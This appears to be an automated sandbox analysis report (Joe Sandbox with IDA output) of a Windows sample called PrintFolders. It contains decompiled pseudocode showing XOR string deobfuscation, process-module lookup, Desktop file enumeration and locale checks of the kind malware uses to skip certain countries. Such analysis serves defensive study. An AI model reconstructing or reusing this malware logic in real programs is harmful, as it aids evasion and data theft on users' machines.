																			_t439 = _t415 ^ 0x0000002e;
																			__eflags = _t439;
																			 *0x450d27 = _t439;
																		}
																		_t416 = 0x450d20;
																		_v144 = 0;
																		_v128 = 0;
																		_v124 = 0xf;
																		_t237 =  &(_t416[1]); // 0x450d21
																		_t626 = _t237;
																		do {
																			_t589 =  *_t416;
																			_t416 =  &(_t416[1]);
																			__eflags = _t589;
																		} while (_t589 != 0);
																		E004026B0(_t522,  &_v144, 0x450d20, _t416 - _t626);
																		_t651 = _v104;
																		_t620 = _v88;
																		__eflags = _v124 - 0x10;
																		_v112 = _t522 | 0x00000001;
																		_t523 = _v144;
																		_t420 =  >=  ? _t523 :  &_v144;
																		__eflags = _v84 - 0x10;
																		_t572 =  >=  ? _t651 :  &_v104;
																		_t421 = E00402890(_t572, _t620, _t572,  >=  ? _t523 :  &_v144, _v128);
																		_t703 = _t703 + 0xc;
																		__eflags = _t421 - 0xffffffff;
																		if(_t421 != 0xffffffff) {
																			L122:
																			_v105 = 1;
																		} else {
																			__eflags = _v84 - 0x10;
																			_t620 = _v88;
																			_t572 =  >=  ? _t651 :  &_v104;
																			_t438 = E00402890(_t572, _t620, _t572, 0x439a6c, 7);
																			_t703 = _t703 + 0xc;
																			_v105 = 0;
																			__eflags = _t438 - 0xffffffff;
																			if(_t438 != 0xffffffff) {
																				goto L122;
																			}
																		}
																		_v112 = _v112 & 0xfffffffe;
																		_t422 = _v124;
																		__eflags = _t422 - 0x10;
																		if(_t422 < 0x10) {
																			L127:
																			__eflags = _v105;
																			if(_v105 != 0) {
																				L143:
																				_t423 = _v84;
																				__eflags = _t423 - 0x10;
																				if(_t423 < 0x10) {
																					L147:
																					_t639 = _v76;
																					_t523 = 1;
																					L139:
																					__eflags = _t639;
																					if(_t639 == 0) {
																						L149:
																						 *[fs:0x0] = _v52;
																						_pop(_t640);
																						_pop(_t653);
																						_pop(_t524);
																						__eflags = _v56 ^ _t672;
																						return E0040EBBF(_t523, _t524, _v56 ^ _t672, _t620, _t640, _t653);
																					} else {
																						_push(_t572);
																						E0040D380(_t639, _v72, _t639, _t651);
																						_t654 = _v76;
																						_t705 = _t703 + 4;
																						_t620 = (0x92492493 * (_v68 - _t654) >> 0x20) + _v68 - _t654 >> 4;
																						_t390 = _t654;
																						_t582 = ((_t620 >> 0x1f) + _t620) * 8 - (_t620 >> 0x1f) + _t620 << 2;
																						__eflags = _t582 - 0x1000;
																						if(_t582 < 0x1000) {
																							L148:
																							_push(_t582);
																							E0040EDFF(_t654);
																							goto L149;
																						} else {
																							_t654 =  *((intOrPtr*)(_t654 - 4));
																							_t582 = _t582 + 0x23;
																							__eflags = _t390 - _t654 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								E00413527(_t523, _t620, __eflags);
																								goto L151;
																							} else {
																								goto L148;
																							}
																						}
																					}
																				} else {
																					_t279 = _t423 + 1; // 0x11
																					_t572 = _t279;
																					_t424 = _t651;
																					__eflags = _t572 - 0x1000;
																					if(_t572 < 0x1000) {
																						L146:
																						_push(_t572);
																						E0040EDFF(_t651);
																						_t703 = _t703 + 8;
																						goto L147;
																					} else {
																						_t654 =  *((intOrPtr*)(_t651 - 4));
																						_t582 = _t572 + 0x23;
																						__eflags = _t424 - _t654 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L151;
																						} else {
																							goto L146;
																						}
																					}
																				}
																			} else {
																				_t428 = _v80;
																				__eflags = _t428 - 0x419;
																				if(_t428 == 0x419) {
																					goto L143;
																				} else {
																					__eflags = _t428 - 0x422;
																					if(_t428 == 0x422) {
																						goto L143;
																					} else {
																						__eflags = _t428 - 0x423;
																						if(_t428 == 0x423) {
																							goto L143;
																						} else {
																							__eflags = _t428 - 0x43f;
																							if(_t428 == 0x43f) {
																								goto L143;
																							} else {
																								_v44 = 0;
																								_t429 = _v84;
																								__eflags = _t429 - 0x10;
																								if(_t429 < 0x10) {
																									goto L136;
																								} else {
																									_t263 = _t429 + 1; // 0x11
																									_t572 = _t263;
																									_t430 = _t651;
																									__eflags = _t572 - 0x1000;
																									if(_t572 < 0x1000) {
																										L135:
																										_push(_t572);
																										E0040EDFF(_t651);
																										_t703 = _t703 + 8;
																										goto L136;
																									} else {
																										_t654 =  *((intOrPtr*)(_t651 - 4));
																										_t582 = _t572 + 0x23;
																										__eflags = _t430 - _t654 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L151;
																										} else {
																											goto L135;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t256 = _t422 + 1; // 0x11
																			_t572 = _t256;
																			_t434 = _t523;
																			__eflags = _t572 - 0x1000;
																			if(_t572 < 0x1000) {
																				L126:
																				_push(_t572);
																				E0040EDFF(_t523);
																				_t651 = _v104;
																				_t703 = _t703 + 8;
																				goto L127;
																			} else {
																				_t523 =  *(_t523 - 4);
																				_t582 = _t572 + 0x23;
																				__eflags = _t434 - _t523 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					L151:
																					E00413527(_t523, _t620, __eflags);
																					asm("int3");
																					asm("int3");
																					_push(_t672);
																					_t674 = _t705;
																					_t396 =  *0x43d054; // 0x7bd02ead
																					_v2304 = _t396 ^ _t674;
																					_push(_t654);
																					_push(_t639);
																					_t641 = _t582;
																					_v2572 = _t641;
																					_v2572 = _t641;
																					_t398 =  *0x439a7c; // 0x3e
																					asm("movq xmm0, [0x439a74]");
																					_v2556 = _t398;
																					asm("movq [ebp-0x108], xmm0");
																					E00410B00(_t641,  &_v2554, 0, 0xfa);
																					_t656 = OpenProcess(0x410, 0, _t620);
																					__eflags = _t656;
																					if(_t656 != 0) {
																						_t409 =  &_v316;
																						__imp__K32EnumProcessModules(_t656, _t409, 4,  &_v312); // executed
																						__eflags = _t409;
																						if(_t409 != 0) {
																							__imp__K32GetModuleBaseNameA(_t656, _v316,  &_v308, 0x104); // executed
																						}
																					}
																					FindCloseChangeNotification(_t656); // executed
																					_t583 =  &_v308;
																					 *_t641 = 0;
																					_t641[4] = 0;
																					_t625 = _t583 + 1;
																					_t641[5] = 0xf;
																					 *_t641 = 0;
																					do {
																						_t403 =  *_t583;
																						_t583 = _t583 + 1;
																						__eflags = _t403;
																					} while (_t403 != 0);
																					E004026B0(_t523, _t641,  &_v308, _t583 - _t625);
																					_pop(_t642);
																					__eflags = _v48 ^ _t674;
																					_pop(_t657);
																					return E0040EBBF(_t641, _t523, _v48 ^ _t674, _t625, _t642, _t657);
																				} else {
																					goto L126;
																				}
																			}
																		}
																		goto L158;
																		L136:
																		_t522 = _v112;
																		_t639 = _t639 + 0x1c;
																		_t658 = _v120;
																		__eflags = _t639 - _v116;
																	} while (_t639 != _v116);
																	_t639 = _v76;
																	goto L138;
																}
															} else {
																goto L107;
															}
														}
													}
													goto L158;
													L108:
													_t637 = _t637 + 1;
													__eflags = _t637 - _v1592;
												} while (_t637 < _v1592);
												goto L109;
											}
										} else {
											goto L59;
										}
									}
								}
							} else {
								goto L13;
							}
						}
					}
				}
				L158:
			}

0x00404490
0x00404491
0x00404499
0x004044a0
0x004044a4
0x004044a6
0x004044a8
0x004044b3
0x004044b4
0x004044b5
0x004044bb
0x004044c0
0x004044c2
0x004044c5
0x004044c6
0x004044c7
0x004044cb
0x004044d1
0x004044d8
0x004044db
0x004044e0
0x004044e7
0x004044ee
0x004044f5
0x00404500
0x00404504
0x00404509
0x0040450d
0x00404512
0x0040451a
0x00404543
0x00404555
0x0040451c
0x00404522
0x00404525
0x0040452d
0x00404531
0x00404535
0x00404535
0x00404567
0x0040456d
0x00404573
0x00404578
0x0040465b
0x0040465b
0x0040465e
0x00404661
0x00404669
0x004046e8
0x004046e8
0x00000000
0x00404670
0x00404670
0x00404674
0x00404683
0x0040468e
0x00404691
0x00404694
0x00404699
0x0040469e
0x004046a4
0x004046a7
0x00000000
0x00000000
0x004046b0
0x004046dd
0x004046dd
0x004046e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004046b2
0x004046b2
0x004046b2
0x004046b5
0x004046bd
0x004046d3
0x004046d3
0x004046d5
0x004046da
0x00000000
0x004046bf
0x004046bf
0x004046c2
0x004046cd
0x00000000
0x00000000
0x00000000
0x00000000
0x004046cd
0x004046bd
0x00000000
0x004046b0
0x004047c7
0x004047ca
0x004047f3
0x004047f3
0x004046ea
0x004046ea
0x004046f0
0x0040471e
0x0040471e
0x00404721
0x00404728
0x0040472f
0x00404735
0x0040479f
0x0040479f
0x004047a5
0x00404807
0x0040480c
0x00404814
0x00404815
0x00404826
0x004047a7
0x004047a7
0x004047aa
0x004047ab
0x004047b3
0x004047fd
0x004047fd
0x004047ff
0x00000000
0x004047b5
0x004047b5
0x004047b8
0x004047c3
0x00000000
0x004047c5
0x00000000
0x004047c5
0x004047c3
0x004047b3
0x00404737
0x0040473a
0x0040473b
0x00404748
0x0040474b
0x00404752
0x0040475f
0x00404761
0x0040476a
0x00404780
0x00404780
0x00404782
0x00404787
0x0040478a
0x00404791
0x00404798
0x00000000
0x0040476c
0x0040476c
0x0040476f
0x0040477a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040477a
0x0040476a
0x004046f2
0x004046f2
0x004046f5
0x004046f6
0x004046fe
0x00404714
0x00404714
0x00404716
0x0040471b
0x00000000
0x00404700
0x00404700
0x00404703
0x0040470e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040470e
0x004046fe
0x004047cc
0x004047cc
0x004047cc
0x004047cf
0x004047d1
0x004047d7
0x004047e9
0x004047e9
0x004047eb
0x004047f0
0x00000000
0x004047d9
0x004047d9
0x004047dc
0x004047e4
0x004047e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004047e7
0x004047d7
0x004047ca
0x0040457e
0x0040457e
0x0040457e
0x004045b2
0x004045b2
0x004045b2
0x004045b4
0x004045b5
0x004045c6
0x004045cb
0x004045cf
0x004045d5
0x00404600
0x00404601
0x00404605
0x0040460a
0x004045d7
0x004045d7
0x004045db
0x004045e1
0x004045e6
0x004045ea
0x004045ed
0x004045f2
0x004045f7
0x004045f7
0x0040460d
0x00404614
0x00404642
0x0040464a
0x0040464e
0x00404590
0x00404590
0x00404596
0x0040459d
0x004045a4
0x004045a7
0x004045ae
0x00000000
0x00404654
0x00404655
0x00000000
0x00404655
0x00404616
0x00404616
0x00404619
0x0040461a
0x00404622
0x00404638
0x00404638
0x0040463a
0x0040463f
0x00000000
0x00404624
0x00404624
0x00404627
0x00404632
0x00404827
0x00404827
0x0040482c
0x0040482c
0x00404831
0x00404832
0x00404833
0x00404834
0x00404835
0x00404836
0x00404837
0x00404838
0x00404839
0x0040483a
0x0040483b
0x0040483c
0x0040483d
0x0040483e
0x0040483f
0x00404840
0x00404841
0x00404849
0x0040484c
0x00404850
0x00404854
0x00404856
0x00404858
0x00404863
0x00404864
0x00404865
0x00404868
0x0040486d
0x0040486f
0x00404872
0x00404873
0x00404874
0x00404878
0x00404884
0x0040488b
0x00404892
0x00404899
0x0040489b
0x004048a0
0x004048a6
0x004048ad
0x004048b2
0x004048b5
0x004048bc
0x004048be
0x004048cb
0x004048d3
0x004048d8
0x004048e5
0x004048ea
0x004048ea
0x004048bc
0x004048ed
0x004048f4
0x004048f6
0x004048f6
0x00404900
0x00404900
0x00404907
0x00404908
0x00404908
0x00404900
0x0040490d
0x00404912
0x00404919
0x00404920
0x00404927
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404933
0x00404942
0x00404947
0x00404951
0x00404955
0x0040495a
0x0040495f
0x00404961
0x00404968
0x0040496a
0x00404971
0x00404974
0x0040497b
0x0040497f
0x0040497f
0x00404982
0x00404982
0x00404984
0x00404985
0x00404985
0x00404990
0x00404995
0x00404999
0x0040499c
0x0040499f
0x004049cd
0x004049cd
0x004049d2
0x004049d7
0x004049de
0x004049e5
0x004049e9
0x004049eb
0x004049f0
0x004049f3
0x00404a16
0x00404a1a
0x00404a1d
0x00404a20
0x00404a22
0x004049f5
0x004049f5
0x004049fb
0x004049fe
0x00404a02
0x00404a04
0x00404a07
0x00404a08
0x00404a0d
0x00404a10
0x00404a10
0x00404a27
0x00404a2c
0x00404a33
0x00404a3a
0x00404a3e
0x00404a44
0x00404a4b
0x00404a50
0x00404a53
0x00404a5a
0x00404a5c
0x00404a69
0x00404a71
0x00404a76
0x00404a83
0x00404a88
0x00404a88
0x00404a5a
0x00404a8b
0x00404a90
0x00404a92
0x00404a94
0x00404a9b
0x00404aa2
0x00404aa9
0x00404ab0
0x00404ab7
0x00404abe
0x00404ac5
0x00404acc
0x00404acc
0x00404ace
0x00404ace
0x00404ad3
0x00404ad6
0x00404adb
0x00404add
0x00404add
0x00404ae0
0x00404ae6
0x00404aed
0x00404af4
0x00404af4
0x00404af6
0x00404af7
0x00404af7
0x00404b05
0x00404b0d
0x00404b12
0x00404b15
0x00404b19
0x00404b1b
0x00404b20
0x00404b24
0x00404b2a
0x00404b31
0x00404b36
0x00404b39
0x00404b40
0x00404b42
0x00404b51
0x00404b58
0x00404b5d
0x00404b6a
0x00404b6f
0x00404b6f
0x00404b40
0x00404b72
0x00404b77
0x00404b79
0x00404b7b
0x00404b84
0x00404b8b
0x00404b8f
0x00404b94
0x00404b94
0x00404b9b
0x00404b9e
0x00404ba3
0x00404ba5
0x00404ba5
0x00404ba8
0x00404bae
0x00404bb5
0x00404bc0
0x00404bc0
0x00404bc2
0x00404bc3
0x00404bc3
0x00404bd1
0x00404bd9
0x00404bde
0x00404be1
0x00404be7
0x00404be9
0x00404bee
0x00404bf2
0x00404bf8
0x00404bff
0x00404c04
0x00404c07
0x00404c0e
0x00404c10
0x00404c20
0x00404c27
0x00404c2d
0x00404c3a
0x00404c3f
0x00404c3f
0x00404c0e
0x00404c42
0x00404c49
0x00404c4b
0x00404c52
0x00404c57
0x00404c5e
0x00404c62
0x00404c70
0x00404c70
0x00404c77
0x00404c78
0x00404c78
0x00404c70
0x00404c7d
0x00404c80
0x00404c85
0x00404c87
0x00404c87
0x00404c8a
0x00404c90
0x00404c97
0x00404ca0
0x00404ca0
0x00404ca2
0x00404ca3
0x00404ca3
0x00404cb1
0x00404cb9
0x00404cbe
0x00404cc1
0x00404cc3
0x00404cd8
0x00404cd8
0x00404cd8
0x00404cc5
0x00404cc5
0x00404cc9
0x00000000
0x00404ccb
0x00404ccb
0x00404ccf
0x00000000
0x00404cd1
0x00404cd1
0x00404cd1
0x00404ccf
0x00404cc9
0x00404cda
0x00404cdd
0x00404ce0
0x00404d0a
0x00404d0f
0x00404d17
0x00404d18
0x00404d1c
0x00404d29
0x00404ce2
0x00404ce2
0x00404ce5
0x00404ce6
0x00404ce8
0x00404cee
0x00404d00
0x00404d00
0x00404d02
0x00000000
0x00404cf0
0x00404cf0
0x00404cf3
0x00404cfb
0x00404cfe
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cfe
0x00404cee
0x004049a1
0x004049a1
0x004049a4
0x004049a5
0x004049a7
0x004049ad
0x004049c3
0x004049c3
0x004049c5
0x004049ca
0x00000000
0x004049af
0x004049af
0x004049b2
0x004049ba
0x004049bd
0x00404d2a
0x00404d2f
0x00404d2f
0x00404d34
0x00404d35
0x00404d36
0x00404d37
0x00404d38
0x00404d39
0x00404d3a
0x00404d3b
0x00404d3c
0x00404d3d
0x00404d3e
0x00404d3f
0x00404d40
0x00404d41
0x00404d49
0x00404d4c
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d75
0x00404d76
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de6
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f0c
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e73
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ebd
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ecb
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ede
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00404eee
0x00000000
0x00404df0
0x00000000
0x00000000
0x00000000
0x004049bd
0x004049ad
0x00000000
0x00000000
0x00000000
0x00404632
0x00404622
0x00404614
0x00000000

APIs

FindFirstFileA.KERNEL32(?,?,00000000), ref: 0040456D
FindNextFileA.KERNEL32(00000000,?,00000000,00000000,?,?), ref: 0040464A
FindClose.KERNEL32(00000000), ref: 00404655
__Init_thread_footer.LIBCMT ref: 004048E5
__Init_thread_footer.LIBCMT ref: 00404A83

Strings

{}k|, xrefs: 00404884
mmBK, xrefs: 00404A2C
\Desktop, xrefs: 004049EB
O@K\, xrefs: 00404A33

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Find$FileInit_thread_footer$CloseFirstNext
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 3881311970-1521651405
Opcode ID: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
Instruction ID: d59c19dc1825489004b71b5d951f6ac136d4c15861c1c7f922f70877673123c4
Opcode Fuzzy Hash: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
Instruction Fuzzy Hash: 503267B1D002448BDB14DF68DC457AEBBB1EF86304F14427EE9007B2D2D7B9A985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004096F0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 599
sleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E004096F0(void* __ecx, void* __edx, signed int __edi, void* __esi) {
				intOrPtr _v8;
				signed char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				signed char _v48;
				signed int _v52;
				signed char _v56;
				signed int _v60;
				signed char _v76;
				signed char _v80;
				signed char _v84;
				signed char _v100;
				signed char _v124;
				signed char _v128;
				signed char _v132;
				signed char _v164;
				char _v172;
				intOrPtr _v176;
				intOrPtr _v192;
				signed int _v196;
				signed int* _v208;
				signed int* _v224;
				signed int* _v240;
				char _v252;
				char _v268;
				char _v444;
				char _v445;
				signed char _v452;
				signed char _v456;
				signed int _v472;
				signed int _v476;
				signed char _v480;
				signed int _v496;
				char _v520;
				signed int _v556;
				intOrPtr _v564;
				void* __ebx;
				void* __ebp;
				signed int _t200;
				signed int _t201;
				intOrPtr _t205;
				intOrPtr _t218;
				void* _t221;
				signed int _t232;
				intOrPtr* _t242;
				signed char _t249;
				signed char _t250;
				void* _t257;
				signed char _t270;
				signed char _t272;
				signed char _t275;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t292;
				signed int _t296;
				intOrPtr _t300;
				signed char _t301;
				signed char _t302;
				char _t304;
				intOrPtr _t316;
				signed char _t317;
				signed char _t318;
				signed char* _t320;
				signed int _t322;
				signed char _t332;
				intOrPtr* _t334;
				signed int _t336;
				void* _t341;
				intOrPtr _t342;
				void* _t344;
				void* _t346;
				intOrPtr* _t349;
				void* _t362;
				signed char* _t370;
				void* _t383;
				signed char _t384;
				signed int _t385;
				signed char* _t389;
				signed char* _t393;
				signed char _t397;
				signed char* _t406;
				signed char _t409;
				long _t411;
				signed char _t413;
				void* _t414;
				signed char* _t415;
				signed char* _t417;
				signed char _t418;
				void* _t419;
				void* _t421;
				void* _t426;
				signed int _t429;
				signed int _t430;
				void* _t433;
				signed int _t436;
				void* _t439;
				void* _t440;
				void* _t441;
				signed int _t442;
				void* _t450;
				void* _t454;
				void* _t492;

				_t420 = __edi;
				_t344 = _t433;
				_t436 = (_t433 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t344 + 4));
				_t429 = _t436;
				_push(0xffffffff);
				_push(0x42cab0);
				_push( *[fs:0x0]);
				_push(_t344);
				_t200 =  *0x43d054; // 0x7bd02ead
				_t201 = _t200 ^ _t429;
				_v32 = _t201;
				_push(__esi);
				_push(__edi);
				_push(_t201);
				 *[fs:0x0] =  &_v24;
				_t424 =  *((intOrPtr*)(_t344 + 0x10));
				_v40 = 0;
				E00417E17(__ecx, E00418873(__ecx, __edx, 0));
				_t349 =  *((intOrPtr*)(_t344 + 0x10));
				_v76 = 0;
				_t439 = _t436 - 0x1f0 + 8;
				_v60 = 0;
				_v56 = 0xf;
				_t402 = _t349 + 1;
				do {
					_t205 =  *_t349;
					_t349 = _t349 + 1;
					_t456 = _t205;
				} while (_t205 != 0);
				E004026B0(_t344,  &_v76, _t424, _t349 - _t402);
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				E00410B00(__edi,  &_v268, 0, 0xa8);
				_t440 = _t439 + 8;
				_v268 = 0x439ce8;
				_v164 = 0;
				asm("xorps xmm0, xmm0");
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v172 = 0x439ca4;
				_v176 = 0x48;
				asm("movlpd [ebp-0xf8], xmm0");
				E0040C400( &_v172, _t402, _t456,  &_v252);
				_t26 = _v268 + 4; // 0x60
				 *((intOrPtr*)(_t429 +  *_t26 - 0x100)) = 0x439cfc;
				_t30 = _v268 + 4; // 0x43a364
				_t31 =  *_t30 - 0x60; // 0x43a304
				 *((intOrPtr*)(_t429 +  *_t30 - 0x104)) = _t31;
				_t354 =  &_v252;
				E0040C330(_t354, _t456);
				_t425 = _v60;
				_t217 =  >=  ? _v76 :  &_v76;
				_v40 =  >=  ? _v76 :  &_v76;
				_t218 = 2;
				_v252 = 0x439c3c;
				if(_t425 > 0x7fffffff) {
					E0040DFF9(__eflags);
					goto L88;
				} else {
					if(_t425 == 0) {
						_v196 = 0;
						L11:
						_push(_t354);
						_t403 =  &_v100;
						_v192 = _t218;
						_v100 = 0;
						_v84 = 0;
						_v80 = 0xf;
						_t242 = E0040D710( &_v268,  &_v100);
						_t440 = _t440 + 4;
						if(( *( *((intOrPtr*)( *_t242 + 4)) + _t242 + 0xc) & 0x00000006) == 0) {
							do {
								_t332 = _v48;
								_push( &_v100);
								if(_t332 == _v44) {
									_push(_t332);
									_t397 =  &_v52;
									E0040D030(_t344, _t397, _t420, _t425);
								} else {
									_t397 = _t332;
									E0040BB90(_t344, _t397, _t403, _t420);
									_v48 = _v48 + 0x18;
								}
								_push(_t397);
								_t403 =  &_v100;
								_t334 = E0040D710( &_v268,  &_v100);
								_t440 = _t440 + 4;
							} while (( *( *((intOrPtr*)( *_t334 + 4)) + _t334 + 0xc) & 0x00000006) == 0);
						}
						_t369 = _v48 - _v52;
						_t420 =  *[fs:0x2c];
						if((0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v52) >> 0x20 >> 2) != 0) {
							L30:
							_t420 =  *_t420;
							_t248 =  *0x451004;
							_v40 = 0x2e45464d;
							if( *0x451004 >  *((intOrPtr*)(_t420 + 4))) {
								E0040EF48(_t248, 0x451004);
								_t440 = _t440 + 4;
								_t474 =  *0x451004 - 0xffffffff;
								if( *0x451004 == 0xffffffff) {
									 *0x450f1c = _v40;
									E0040F25B(_t369, _t474, 0x42d500);
									E0040EEFE(0x451004);
									_t440 = _t440 + 8;
								}
							}
							_t249 =  *0x450f1f; // 0x0
							if(_t249 != 0) {
								 *0x450f1c =  *0x450f1c ^ 0x0000002e;
								 *0x450f1d =  *0x450f1d ^ 0x0000002e;
								 *0x450f1e =  *0x450f1e ^ 0x0000002e;
								 *0x450f1f = _t249 ^ 0x0000002e;
							}
							_t370 = 0x450f1c;
							_v496 = 0;
							_v480 = 0;
							_v476 = 0xf;
							_t106 =  &(_t370[1]); // 0x450f1d
							_t406 = _t106;
							do {
								_t250 =  *_t370;
								_t370 =  &(_t370[1]);
							} while (_t250 != 0);
							E004026B0(_t344,  &_v496, 0x450f1c, _t370 - _t406);
							_t425 = _v52;
							_t354 = _t425;
							_v40 = 5;
							if(E0040CA60(_t425,  &_v496) != 0) {
								L47:
								__eflags = _v40 & 0x00000002;
								_v445 = 1;
								if(__eflags == 0) {
									goto L52;
								} else {
									goto L48;
								}
							} else {
								_t300 =  *0x450d3c; // 0x8000000a
								_v40 = 0x45464d01;
								_v445 = 0x2e;
								if(_t300 >  *((intOrPtr*)(_t420 + 4))) {
									E0040EF48(_t300, 0x450d3c);
									_t440 = _t440 + 4;
									_t480 =  *0x450d3c - 0xffffffff;
									if( *0x450d3c == 0xffffffff) {
										 *0x450dd4 = _v40;
										 *0x450dd8 = _v445;
										E0040F25B(_t354, _t480, 0x42d4e0);
